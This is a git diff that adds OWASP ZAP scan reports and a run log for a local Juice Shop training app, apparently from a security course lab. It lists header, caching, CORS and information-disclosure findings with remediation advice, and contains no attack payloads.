Ensure that the application/web server sets the Cross-Origin-Embedder-Policy header appropriately, and that it sets the Cross-Origin-Embedder-Policy header to 'require-corp' for documents.
+
+ +
If possible, ensure that the end user uses a standards-compliant and modern web browser that supports the Cross-Origin-Embedder-Policy header (https://caniuse.com/mdn-http_headers_cross-origin-embedder-policy).
+ +
Reference + https://developer.mozilla.org/en-US/docs/Web/HTTP/Reference/Headers/Cross-Origin-Embedder-Policy + +
CWE Id693
WASC Id14
Plugin Id90004
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
+
Low
Timestamp Disclosure - Unix
Description +
A timestamp was disclosed by the application/web server. - Unix
+ +
URLhttp://localhost:3000
MethodGET
Parameter
Attack
Evidence1650485437
Other Info1650485437, which evaluates to: 2022-04-20 20:10:37.
URLhttp://localhost:3000
MethodGET
Parameter
Attack
Evidence1981395349
Other Info1981395349, which evaluates to: 2032-10-14 19:35:49.
URLhttp://localhost:3000
MethodGET
Parameter
Attack
Evidence2038834951
Other Info2038834951, which evaluates to: 2034-08-10 15:02:31.
URLhttp://localhost:3000/sitemap.xml
MethodGET
Parameter
Attack
Evidence1650485437
Other Info1650485437, which evaluates to: 2022-04-20 20:10:37.
URLhttp://localhost:3000/sitemap.xml
MethodGET
Parameter
Attack
Evidence1981395349
Other Info1981395349, which evaluates to: 2032-10-14 19:35:49.
URLhttp://localhost:3000/sitemap.xml
MethodGET
Parameter
Attack
Evidence2038834951
Other Info2038834951, which evaluates to: 2034-08-10 15:02:31.
URLhttp://localhost:3000/styles.css
MethodGET
Parameter
Attack
Evidence1650485437
Other Info1650485437, which evaluates to: 2022-04-20 20:10:37.
URLhttp://localhost:3000/styles.css
MethodGET
Parameter
Attack
Evidence1680327869
Other Info1680327869, which evaluates to: 2023-04-01 05:44:29.
URLhttp://localhost:3000/styles.css
MethodGET
Parameter
Attack
Evidence1701244813
Other Info1701244813, which evaluates to: 2023-11-29 08:00:13.
URLhttp://localhost:3000/styles.css
MethodGET
Parameter
Attack
Evidence1818181818
Other Info1818181818, which evaluates to: 2027-08-13 18:30:18.
URLhttp://localhost:3000/styles.css
MethodGET
Parameter
Attack
Evidence1839622642
Other Info1839622642, which evaluates to: 2028-04-17 22:17:22.
URLhttp://localhost:3000/styles.css
MethodGET
Parameter
Attack
Evidence1863874346
Other Info1863874346, which evaluates to: 2029-01-23 14:52:26.
URLhttp://localhost:3000/styles.css
MethodGET
Parameter
Attack
Evidence1917098446
Other Info1917098446, which evaluates to: 2030-10-01 15:20:46.
URLhttp://localhost:3000/styles.css
MethodGET
Parameter
Attack
Evidence1981395349
Other Info1981395349, which evaluates to: 2032-10-14 19:35:49.
URLhttp://localhost:3000/styles.css
MethodGET
Parameter
Attack
Evidence2033195021
Other Info2033195021, which evaluates to: 2034-06-06 08:23:41.
URLhttp://localhost:3000/styles.css
MethodGET
Parameter
Attack
Evidence2038834951
Other Info2038834951, which evaluates to: 2034-08-10 15:02:31.
Instances16
Solution +
Manually confirm that the timestamp data is not sensitive, and that the data cannot be aggregated to disclose exploitable patterns.
+ +
Reference + https://cwe.mitre.org/data/definitions/200.html + +
CWE Id497
WASC Id13
Plugin Id10096
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
+
Low
ZAP is Out of Date
Description +
The version of ZAP you are using to test your app is out of date and is no longer being updated.
+
+ +
The risk level is set based on how out of date your ZAP version is.
+ +
URLhttp://localhost:3000
MethodGET
Parameter
Attack
Evidence
Other InfoThe latest version of ZAP is 2.17.0
Instances1
Solution +
Download the latest version of ZAP from https://www.zaproxy.org/download/ and install it.
+ +
Reference + https://www.zaproxy.org/download/ + +
CWE Id1104
WASC Id45
Plugin Id10116
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
+
Informational
Information Disclosure - Suspicious Comments
Description +
The response appears to contain suspicious comments which may help an attacker.
+ +
URLhttp://localhost:3000/main.js
MethodGET
Parameter
Attack
Evidencequery
Other InfoThe following pattern was used: \bQUERY\b and was detected in likely comment: "//owasp.org' target='_blank'>Open Worldwide Application Security Project (OWASP)</a> and is developed and maintained by voluntee", see evidence field for the suspicious comment/snippet.
URLhttp://localhost:3000/vendor.js
MethodGET
Parameter
Attack
EvidenceQuery
Other InfoThe following pattern was used: \bQUERY\b and was detected in likely comment: "//www.w3.org/2000/svg" viewBox="0 0 512 512"><path d="M0 256C0 397.4 114.6 512 256 512s256-114.6 256-256S397.4 0 256 0S0 114.6 0", see evidence field for the suspicious comment/snippet.
Instances2
Solution +
Remove all comments that return information that may help an attacker and fix any underlying problems they refer to.
+ +
Reference
CWE Id615
WASC Id13
Plugin Id10027
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
+
Informational
Modern Web Application
Description +
The application appears to be a modern web application. If you need to explore it automatically then the Ajax Spider may well be more effective than the standard one.
+ +
URLhttp://localhost:3000
MethodGET
Parameter
Attack
Evidence<script src="//cdnjs.cloudflare.com/ajax/libs/cookieconsent2/3.1.0/cookieconsent.min.js"></script>
Other InfoNo links have been found while there are scripts, which is an indication that this is a modern web application.
URLhttp://localhost:3000/juice-shop/build/routes/fileServer.js:43:13
MethodGET
Parameter
Attack
Evidence<script src="//cdnjs.cloudflare.com/ajax/libs/cookieconsent2/3.1.0/cookieconsent.min.js"></script>
Other InfoNo links have been found while there are scripts, which is an indication that this is a modern web application.
URLhttp://localhost:3000/juice-shop/build/routes/fileServer.js:59:18
MethodGET
Parameter
Attack
Evidence<script src="//cdnjs.cloudflare.com/ajax/libs/cookieconsent2/3.1.0/cookieconsent.min.js"></script>
Other InfoNo links have been found while there are scripts, which is an indication that this is a modern web application.
URLhttp://localhost:3000/juice-shop/build/routes/styles.css
MethodGET
Parameter
Attack
Evidence<script src="//cdnjs.cloudflare.com/ajax/libs/cookieconsent2/3.1.0/cookieconsent.min.js"></script>
Other InfoNo links have been found while there are scripts, which is an indication that this is a modern web application.
URLhttp://localhost:3000/juice-shop/node_modules/express/lib/router/assets/public/assets/public/favicon_js.ico
MethodGET
Parameter
Attack
Evidence<script src="//cdnjs.cloudflare.com/ajax/libs/cookieconsent2/3.1.0/cookieconsent.min.js"></script>
Other InfoNo links have been found while there are scripts, which is an indication that this is a modern web application.
URLhttp://localhost:3000/juice-shop/node_modules/express/lib/router/assets/public/styles.css
MethodGET
Parameter
Attack
Evidence<script src="//cdnjs.cloudflare.com/ajax/libs/cookieconsent2/3.1.0/cookieconsent.min.js"></script>
Other InfoNo links have been found while there are scripts, which is an indication that this is a modern web application.
URLhttp://localhost:3000/juice-shop/node_modules/express/lib/router/index.js:328:13
MethodGET
Parameter
Attack
Evidence<script src="//cdnjs.cloudflare.com/ajax/libs/cookieconsent2/3.1.0/cookieconsent.min.js"></script>
Other InfoNo links have been found while there are scripts, which is an indication that this is a modern web application.
URLhttp://localhost:3000/juice-shop/node_modules/express/lib/router/index.js:376:14
MethodGET
Parameter
Attack
Evidence<script src="//cdnjs.cloudflare.com/ajax/libs/cookieconsent2/3.1.0/cookieconsent.min.js"></script>
Other InfoNo links have been found while there are scripts, which is an indication that this is a modern web application.
URLhttp://localhost:3000/juice-shop/node_modules/express/lib/router/main.js
MethodGET
Parameter
Attack
Evidence<script src="//cdnjs.cloudflare.com/ajax/libs/cookieconsent2/3.1.0/cookieconsent.min.js"></script>
Other InfoNo links have been found while there are scripts, which is an indication that this is a modern web application.
URLhttp://localhost:3000/juice-shop/node_modules/express/lib/router/polyfills.js
MethodGET
Parameter
Attack
Evidence<script src="//cdnjs.cloudflare.com/ajax/libs/cookieconsent2/3.1.0/cookieconsent.min.js"></script>
Other InfoNo links have been found while there are scripts, which is an indication that this is a modern web application.
URLhttp://localhost:3000/juice-shop/node_modules/express/lib/router/runtime.js
MethodGET
Parameter
Attack
Evidence<script src="//cdnjs.cloudflare.com/ajax/libs/cookieconsent2/3.1.0/cookieconsent.min.js"></script>
Other InfoNo links have been found while there are scripts, which is an indication that this is a modern web application.
URLhttp://localhost:3000/juice-shop/node_modules/express/lib/router/styles.css
MethodGET
Parameter
Attack
Evidence<script src="//cdnjs.cloudflare.com/ajax/libs/cookieconsent2/3.1.0/cookieconsent.min.js"></script>
Other InfoNo links have been found while there are scripts, which is an indication that this is a modern web application.
URLhttp://localhost:3000/juice-shop/node_modules/serve-index/assets/public/styles.css
MethodGET
Parameter
Attack
Evidence<script src="//cdnjs.cloudflare.com/ajax/libs/cookieconsent2/3.1.0/cookieconsent.min.js"></script>
Other InfoNo links have been found while there are scripts, which is an indication that this is a modern web application.
URLhttp://localhost:3000/sitemap.xml
MethodGET
Parameter
Attack
Evidence<script src="//cdnjs.cloudflare.com/ajax/libs/cookieconsent2/3.1.0/cookieconsent.min.js"></script>
Other InfoNo links have been found while there are scripts, which is an indication that this is a modern web application.
Instances14
Solution +
This is an informational alert and so no changes are required.
+ +
Reference
CWE Id
WASC Id
Plugin Id10109
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
+
Informational
Non-Storable Content
Description +
The response contents are not storable by caching components such as proxy servers. If the response does not contain sensitive, personal or user-specific information, it may benefit from being stored and cached, to improve performance.
+ +
URLhttp://localhost:3000/ftp/eastere.gg
MethodGET
Parameter
Attack
Evidence403
Other Info
URLhttp://localhost:3000/ftp/encrypt.pyc
MethodGET
Parameter
Attack
Evidence403
Other Info
URLhttp://localhost:3000/ftp/package.json.bak
MethodGET
Parameter
Attack
Evidence403
Other Info
Instances3
Solution +
The content may be marked as storable by ensuring that the following conditions are satisfied:
+
+ +
The request method must be understood by the cache and defined as being cacheable ("GET", "HEAD", and "POST" are currently defined as cacheable)
+
+ +
The response status code must be understood by the cache (one of the 1XX, 2XX, 3XX, 4XX, or 5XX response classes are generally understood)
+
+ +
The "no-store" cache directive must not appear in the request or response header fields
+
+ +
For caching by "shared" caches such as "proxy" caches, the "private" response directive must not appear in the response
+
+ +
For caching by "shared" caches such as "proxy" caches, the "Authorization" header field must not appear in the request, unless the response explicitly allows it (using one of the "must-revalidate", "public", or "s-maxage" Cache-Control response directives)
+
+ +
In addition to the conditions above, at least one of the following conditions must also be satisfied by the response:
+
+ +
It must contain an "Expires" header field
+
+ +
It must contain a "max-age" response directive
+
+ +
For "shared" caches such as "proxy" caches, it must contain a "s-maxage" response directive
+
+ +
It must contain a "Cache Control Extension" that allows it to be cached
+
+ +
It must have a status code that is defined as cacheable by default (200, 203, 204, 206, 300, 301, 404, 405, 410, 414, 501).
+ +
Reference + https://datatracker.ietf.org/doc/html/rfc7234 +
+ + https://datatracker.ietf.org/doc/html/rfc7231 +
+ + https://www.w3.org/Protocols/rfc2616/rfc2616-sec13.html + +
CWE Id524
WASC Id13
Plugin Id10049
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
+
Informational
Storable and Cacheable Content
Description +
The response contents are storable by caching components such as proxy servers, and may be retrieved directly from the cache, rather than from the origin server by the caching servers, in response to similar requests from other users. If the response data is sensitive, personal or user-specific, this may result in sensitive information being leaked. In some cases, this may even result in a user gaining complete control of the session of another user, depending on the configuration of the caching components in use in their environment. This is primarily an issue where "shared" caching servers such as "proxy" caches are configured on the local network. This configuration is typically found in corporate or educational environments, for instance.
+ +
URLhttp://localhost:3000/robots.txt
MethodGET
Parameter
Attack
Evidence
Other InfoIn the absence of an explicitly specified caching lifetime directive in the response, a liberal lifetime heuristic of 1 year was assumed. This is permitted by rfc7234.
Instances1
Solution +
Validate that the response does not contain sensitive, personal or user-specific information. If it does, consider the use of the following HTTP response headers, to limit, or prevent the content being stored and retrieved from the cache by another user:
+
+ +
Cache-Control: no-cache, no-store, must-revalidate, private
+
+ +
Pragma: no-cache
+
+ +
Expires: 0
+
+ +
This configuration directs both HTTP 1.0 and HTTP 1.1 compliant caching servers to not store the response, and to not retrieve the response (without validation) from the cache, in response to a similar request.
+ +
Reference + https://datatracker.ietf.org/doc/html/rfc7234 +
+ + https://datatracker.ietf.org/doc/html/rfc7231 +
+ + https://www.w3.org/Protocols/rfc2616/rfc2616-sec13.html + +
CWE Id524
WASC Id13
Plugin Id10049
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
+
Informational
Storable but Non-Cacheable Content
Description +
The response contents are storable by caching components such as proxy servers, but will not be retrieved directly from the cache, without validating the request upstream, in response to similar requests from other users.
+ +
URLhttp://localhost:3000
MethodGET
Parameter
Attack
Evidencemax-age=0
Other Info
URLhttp://localhost:3000/assets/public/favicon_js.ico
MethodGET
Parameter
Attack
Evidencemax-age=0
Other Info
URLhttp://localhost:3000/ftp/acquisitions.md
MethodGET
Parameter
Attack
Evidencemax-age=0
Other Info
URLhttp://localhost:3000/ftp/incident-support.kdbx
MethodGET
Parameter
Attack
Evidencemax-age=0
Other Info
URLhttp://localhost:3000/ftp/legal.md
MethodGET
Parameter
Attack
Evidencemax-age=0
Other Info
URLhttp://localhost:3000/main.js
MethodGET
Parameter
Attack
Evidencemax-age=0
Other Info
URLhttp://localhost:3000/polyfills.js
MethodGET
Parameter
Attack
Evidencemax-age=0
Other Info
URLhttp://localhost:3000/runtime.js
MethodGET
Parameter
Attack
Evidencemax-age=0
Other Info
URLhttp://localhost:3000/sitemap.xml
MethodGET
Parameter
Attack
Evidencemax-age=0
Other Info
URLhttp://localhost:3000/styles.css
MethodGET
Parameter
Attack
Evidencemax-age=0
Other Info
URLhttp://localhost:3000/vendor.js
MethodGET
Parameter
Attack
Evidencemax-age=0
Other Info
Instances11
Solution
Reference + https://datatracker.ietf.org/doc/html/rfc7234 +
+ + https://datatracker.ietf.org/doc/html/rfc7231 +
+ + https://www.w3.org/Protocols/rfc2616/rfc2616-sec13.html + +
CWE Id524
WASC Id13
Plugin Id10049
+
+ + + + + +

Sequence Details

+ With the associated active scan results. + + + +
+ + + + + + + diff --git a/labs/lab5/zap/zap-auth-run.log b/labs/lab5/zap/zap-auth-run.log new file mode 100644 index 00000000..2a039657 --- /dev/null +++ b/labs/lab5/zap/zap-auth-run.log @@ -0,0 +1,114 @@ +Using the Automation Framework +Total of 95 URLs +PASS: Vulnerable JS Library (Powered by Retire.js) [10003] +PASS: In Page Banner Information Leak [10009] +PASS: Cookie No HttpOnly Flag [10010] +PASS: Cookie Without Secure Flag [10011] +PASS: Re-examine Cache-control Directives [10015] +PASS: Content-Type Header Missing [10019] +PASS: Anti-clickjacking Header [10020] +PASS: X-Content-Type-Options Header Missing [10021] +PASS: Information Disclosure - Debug Error Messages [10023] +PASS: Information Disclosure - Sensitive Information in URL [10024] +PASS: Information Disclosure - Sensitive Information in HTTP Referrer Header [10025] +PASS: HTTP Parameter Override [10026] +PASS: Off-site Redirect [10028] +PASS: Cookie Poisoning [10029] +PASS: User Controllable Charset [10030] +PASS: User Controllable HTML Element Attribute (Potential XSS) [10031] +PASS: Viewstate [10032] +PASS: Directory Browsing [10033] +PASS: Heartbleed OpenSSL Vulnerability (Indicative) [10034] +PASS: Strict-Transport-Security Header [10035] +PASS: HTTP Server Response Header [10036] +PASS: Server Leaks Information via "X-Powered-By" HTTP Response Header Field(s) [10037] +PASS: X-Backend-Server Header Information Leak [10039] +PASS: Secure Pages Include Mixed Content [10040] +PASS: HTTP to HTTPS Insecure Transition in Form Post [10041] +PASS: HTTPS to HTTP Insecure Transition in Form Post [10042] +PASS: User Controllable JavaScript Event (XSS) [10043] +PASS: Big Redirect Detected (Potential Sensitive Information Leak) [10044] +PASS: Retrieved from Cache [10050] +PASS: X-ChromeLogger-Data (XCOLD) Header Information Leak [10052] +PASS: Cookie without SameSite Attribute [10054] +PASS: CSP [10055] +PASS: X-Debug-Token Information Leak [10056] +PASS: Username Hash Found [10057] +PASS: X-AspNet-Version Response Header [10061] +PASS: PII Disclosure [10062] +PASS: Hash Disclosure [10097] +PASS: Source Code Disclosure [10099] +PASS: Weak Authentication Method [10105] +PASS: Reverse Tabnabbing [10108] +PASS: Authentication Request Identified [10111] +PASS: Session Management Response Identified [10112] +PASS: Verification Request Identified [10113] +PASS: Script Served From Malicious Domain (polyfill) [10115] +PASS: ZAP is Out of Date [10116] +PASS: Absence of Anti-CSRF Tokens [10202] +PASS: Private IP Disclosure [2] +PASS: Session ID in URL Rewrite [3] +PASS: Script Passive Scan Rules [50001] +PASS: Stats Passive Scan Rule [50003] +PASS: Insecure JSF ViewState [90001] +PASS: Java Serialization Object [90002] +PASS: Sub Resource Integrity Attribute Missing [90003] +PASS: Charset Mismatch [90011] +PASS: Application Error Disclosure [90022] +PASS: WSDL File Detection [90030] +PASS: Loosely Scoped Cookie [90033] +WARN-NEW: Cross-Domain JavaScript Source File Inclusion [10017] x 10 + http://localhost:3000 (200 OK) + http://localhost:3000 (200 OK) + http://localhost:3000/ (200 OK) + http://localhost:3000/ (200 OK) + http://localhost:3000/juice-shop/build/routes/assets/public/favicon_js.ico (200 OK) +WARN-NEW: Information Disclosure - Suspicious Comments [10027] x 2 + http://localhost:3000/main.js (200 OK) + http://localhost:3000/vendor.js (200 OK) +WARN-NEW: Content Security Policy (CSP) Header Not Set [10038] x 11 + http://localhost:3000 (200 OK) + http://localhost:3000/ (200 OK) + http://localhost:3000/ftp (200 OK) + http://localhost:3000/ftp/coupons_2013.md.bak (403 Forbidden) + http://localhost:3000/ftp/encrypt.pyc (403 Forbidden) +WARN-NEW: Non-Storable Content [10049] x 11 + http://localhost:3000/ftp (200 OK) + http://localhost:3000/ftp/coupons_2013.md.bak (403 Forbidden) + http://localhost:3000/ftp/package-lock.json.bak (403 Forbidden) + http://localhost:3000/robots.txt (200 OK) + http://localhost:3000 (200 OK) +WARN-NEW: Deprecated Feature Policy Header Set [10063] x 11 + http://localhost:3000 (200 OK) + http://localhost:3000/ (200 OK) + http://localhost:3000/ftp (200 OK) + http://localhost:3000/ftp/coupons_2013.md.bak (403 Forbidden) + http://localhost:3000/ftp/encrypt.pyc (403 Forbidden) +WARN-NEW: Timestamp Disclosure - Unix [10096] x 16 + http://localhost:3000 (200 OK) + http://localhost:3000 (200 OK) + http://localhost:3000 (200 OK) + http://localhost:3000/sitemap.xml (200 OK) + http://localhost:3000/sitemap.xml (200 OK) +WARN-NEW: Cross-Domain Misconfiguration [10098] x 10 + http://localhost:3000 (200 OK) + http://localhost:3000/assets/public/favicon_js.ico (200 OK) + http://localhost:3000/ftp (200 OK) + http://localhost:3000/juice-shop/build/routes/assets/public/favicon_js.ico (200 OK) + http://localhost:3000/main.js (200 OK) +WARN-NEW: Modern Web Application [10109] x 11 + http://localhost:3000 (200 OK) + http://localhost:3000/ (200 OK) + http://localhost:3000/juice-shop/build/routes/assets/public/favicon_js.ico (200 OK) + http://localhost:3000/juice-shop/build/routes/fileServer.js:43:13 (200 OK) + http://localhost:3000/juice-shop/build/routes/fileServer.js:59:18 (200 OK) +WARN-NEW: Dangerous JS Functions [10110] x 2 + http://localhost:3000/main.js (200 OK) + http://localhost:3000/vendor.js (200 OK) +WARN-NEW: Insufficient Site Isolation Against Spectre Vulnerability [90004] x 10 + http://localhost:3000 (200 OK) + http://localhost:3000/ (200 OK) + http://localhost:3000/ftp (200 OK) + http://localhost:3000/juice-shop/build/routes/assets/public/favicon_js.ico (200 OK) + http://localhost:3000/sitemap.xml (200 OK) +FAIL-NEW: 0 FAIL-INPROG: 0 WARN-NEW: 10 WARN-INPROG: 0 INFO: 0 IGNORE: 0 PASS: 57 diff --git a/labs/lab5/zap/zap-report-auth.json b/labs/lab5/zap/zap-report-auth.json new file mode 100644 index 00000000..8041b8fa --- /dev/null +++ b/labs/lab5/zap/zap-report-auth.json @@ -0,0 +1,1179 @@ +{ + "@programName": "ZAP", + "@version": "2.16.1", + "@generated": "Fri, 8 May 2026 08:45:34", + "created": "2026-05-08T08:45:34.330601898Z", + "site":[ + { + "@name": "http://localhost:3000", + "@host": "localhost", + "@port": "3000", + "@ssl": "false", + "alerts": [ + { + "pluginid": "10038", + "alertRef": "10038-1", + "alert": "Content Security Policy (CSP) Header Not Set", + "name": "Content Security Policy (CSP) Header Not Set", + "riskcode": "2", + "confidence": "3", + "riskdesc": "Medium (High)", + "desc": "

Content Security Policy (CSP) is an added layer of security that helps to detect and mitigate certain types of attacks, including Cross Site Scripting (XSS) and data injection attacks. These attacks are used for everything from data theft to site defacement or distribution of malware. CSP provides a set of standard HTTP headers that allow website owners to declare approved sources of content that browsers should be allowed to load on that page \u2014 covered types are JavaScript, CSS, HTML frames, fonts, images and embeddable objects such as Java applets, ActiveX, audio and video files.

", + "instances":[ + { + "id": "8", + "uri": "http://localhost:3000", + "nodeName": null, + "method": "GET", + "param": "", + "attack": "", + "evidence": "", + "otherinfo": "" + }, + { + "id": "56", + "uri": "http://localhost:3000/", + "nodeName": null, + "method": "GET", + "param": "", + "attack": "", + "evidence": "", + "otherinfo": "" + }, + { + "id": "54", + "uri": "http://localhost:3000/ftp", + "nodeName": null, + "method": "GET", + "param": "", + "attack": "", + "evidence": "", + "otherinfo": "" + }, + { + "id": "63", + "uri": "http://localhost:3000/ftp/coupons_2013.md.bak", + "nodeName": null, + "method": "GET", + "param": "", + "attack": "", + "evidence": "", + "otherinfo": "" + }, + { + "id": "66", + "uri": "http://localhost:3000/ftp/encrypt.pyc", + "nodeName": null, + "method": "GET", + "param": "", + "attack": "", + "evidence": "", + "otherinfo": "" + }, + { + "id": "65", + "uri": "http://localhost:3000/ftp/package-lock.json.bak", + "nodeName": null, + "method": "GET", + "param": "", + "attack": "", + "evidence": "", + "otherinfo": "" + }, + { + "id": "67", + "uri": "http://localhost:3000/ftp/suspicious_errors.yml", + "nodeName": null, + "method": "GET", + "param": "", + "attack": "", + "evidence": "", + "otherinfo": "" + }, + { + "id": "49", + "uri": "http://localhost:3000/juice-shop/build/routes/assets/public/favicon_js.ico", + "nodeName": null, + "method": "GET", + "param": "", + "attack": "", + "evidence": "", + "otherinfo": "" + }, + { + "id": "60", + "uri": "http://localhost:3000/juice-shop/build/routes/fileServer.js:43:13", + "nodeName": null, + "method": "GET", + "param": "", + "attack": "", + "evidence": "", + "otherinfo": "" + }, + { + "id": "68", + "uri": "http://localhost:3000/juice-shop/node_modules/serve-index/index.js:145:39", + "nodeName": null, + "method": "GET", + "param": "", + "attack": "", + "evidence": "", + "otherinfo": "" + }, + { + "id": "7", + "uri": "http://localhost:3000/sitemap.xml", + "nodeName": null, + "method": "GET", + "param": "", + "attack": "", + "evidence": "", + "otherinfo": "" + } + ], + "count": "11", + "systemic": false, + "solution": "

Ensure that your web server, application server, load balancer, etc. is configured to set the Content-Security-Policy header.

", + "otherinfo": "", + "reference": "

https://developer.mozilla.org/en-US/docs/Web/HTTP/Guides/CSP

https://cheatsheetseries.owasp.org/cheatsheets/Content_Security_Policy_Cheat_Sheet.html

https://www.w3.org/TR/CSP/

https://w3c.github.io/webappsec-csp/

https://web.dev/articles/csp

https://caniuse.com/#feat=contentsecuritypolicy

https://content-security-policy.com/

", + "cweid": "693", + "wascid": "15", + "sourceid": "8" + }, + { + "pluginid": "10098", + "alertRef": "10098", + "alert": "Cross-Domain Misconfiguration", + "name": "Cross-Domain Misconfiguration", + "riskcode": "2", + "confidence": "2", + "riskdesc": "Medium (Medium)", + "desc": "

Web browser data loading may be possible, due to a Cross Origin Resource Sharing (CORS) misconfiguration on the web server.

", + "instances":[ + { + "id": "10", + "uri": "http://localhost:3000", + "nodeName": null, + "method": "GET", + "param": "", + "attack": "", + "evidence": "Access-Control-Allow-Origin: *", + "otherinfo": "The CORS misconfiguration on the web server permits cross-domain read requests from arbitrary third party domains, using unauthenticated APIs on this domain. Web browser implementations do not permit arbitrary third parties to read the response from authenticated APIs, however. This reduces the risk somewhat. This misconfiguration could be used by an attacker to access data that is available in an unauthenticated manner, but which uses some other form of security, such as IP address white-listing." + }, + { + "id": "0", + "uri": "http://localhost:3000/assets/public/favicon_js.ico", + "nodeName": null, + "method": "GET", + "param": "", + "attack": "", + "evidence": "Access-Control-Allow-Origin: *", + "otherinfo": "The CORS misconfiguration on the web server permits cross-domain read requests from arbitrary third party domains, using unauthenticated APIs on this domain. Web browser implementations do not permit arbitrary third parties to read the response from authenticated APIs, however. This reduces the risk somewhat. This misconfiguration could be used by an attacker to access data that is available in an unauthenticated manner, but which uses some other form of security, such as IP address white-listing." + }, + { + "id": "55", + "uri": "http://localhost:3000/ftp", + "nodeName": null, + "method": "GET", + "param": "", + "attack": "", + "evidence": "Access-Control-Allow-Origin: *", + "otherinfo": "The CORS misconfiguration on the web server permits cross-domain read requests from arbitrary third party domains, using unauthenticated APIs on this domain. Web browser implementations do not permit arbitrary third parties to read the response from authenticated APIs, however. This reduces the risk somewhat. This misconfiguration could be used by an attacker to access data that is available in an unauthenticated manner, but which uses some other form of security, such as IP address white-listing." + }, + { + "id": "50", + "uri": "http://localhost:3000/juice-shop/build/routes/assets/public/favicon_js.ico", + "nodeName": null, + "method": "GET", + "param": "", + "attack": "", + "evidence": "Access-Control-Allow-Origin: *", + "otherinfo": "The CORS misconfiguration on the web server permits cross-domain read requests from arbitrary third party domains, using unauthenticated APIs on this domain. Web browser implementations do not permit arbitrary third parties to read the response from authenticated APIs, however. This reduces the risk somewhat. This misconfiguration could be used by an attacker to access data that is available in an unauthenticated manner, but which uses some other form of security, such as IP address white-listing." + }, + { + "id": "4", + "uri": "http://localhost:3000/main.js", + "nodeName": null, + "method": "GET", + "param": "", + "attack": "", + "evidence": "Access-Control-Allow-Origin: *", + "otherinfo": "The CORS misconfiguration on the web server permits cross-domain read requests from arbitrary third party domains, using unauthenticated APIs on this domain. Web browser implementations do not permit arbitrary third parties to read the response from authenticated APIs, however. This reduces the risk somewhat. This misconfiguration could be used by an attacker to access data that is available in an unauthenticated manner, but which uses some other form of security, such as IP address white-listing." + }, + { + "id": "2", + "uri": "http://localhost:3000/polyfills.js", + "nodeName": null, + "method": "GET", + "param": "", + "attack": "", + "evidence": "Access-Control-Allow-Origin: *", + "otherinfo": "The CORS misconfiguration on the web server permits cross-domain read requests from arbitrary third party domains, using unauthenticated APIs on this domain. Web browser implementations do not permit arbitrary third parties to read the response from authenticated APIs, however. This reduces the risk somewhat. This misconfiguration could be used by an attacker to access data that is available in an unauthenticated manner, but which uses some other form of security, such as IP address white-listing." + }, + { + "id": "6", + "uri": "http://localhost:3000/robots.txt", + "nodeName": null, + "method": "GET", + "param": "", + "attack": "", + "evidence": "Access-Control-Allow-Origin: *", + "otherinfo": "The CORS misconfiguration on the web server permits cross-domain read requests from arbitrary third party domains, using unauthenticated APIs on this domain. Web browser implementations do not permit arbitrary third parties to read the response from authenticated APIs, however. This reduces the risk somewhat. This misconfiguration could be used by an attacker to access data that is available in an unauthenticated manner, but which uses some other form of security, such as IP address white-listing." + }, + { + "id": "11", + "uri": "http://localhost:3000/sitemap.xml", + "nodeName": null, + "method": "GET", + "param": "", + "attack": "", + "evidence": "Access-Control-Allow-Origin: *", + "otherinfo": "The CORS misconfiguration on the web server permits cross-domain read requests from arbitrary third party domains, using unauthenticated APIs on this domain. Web browser implementations do not permit arbitrary third parties to read the response from authenticated APIs, however. This reduces the risk somewhat. This misconfiguration could be used by an attacker to access data that is available in an unauthenticated manner, but which uses some other form of security, such as IP address white-listing." + }, + { + "id": "3", + 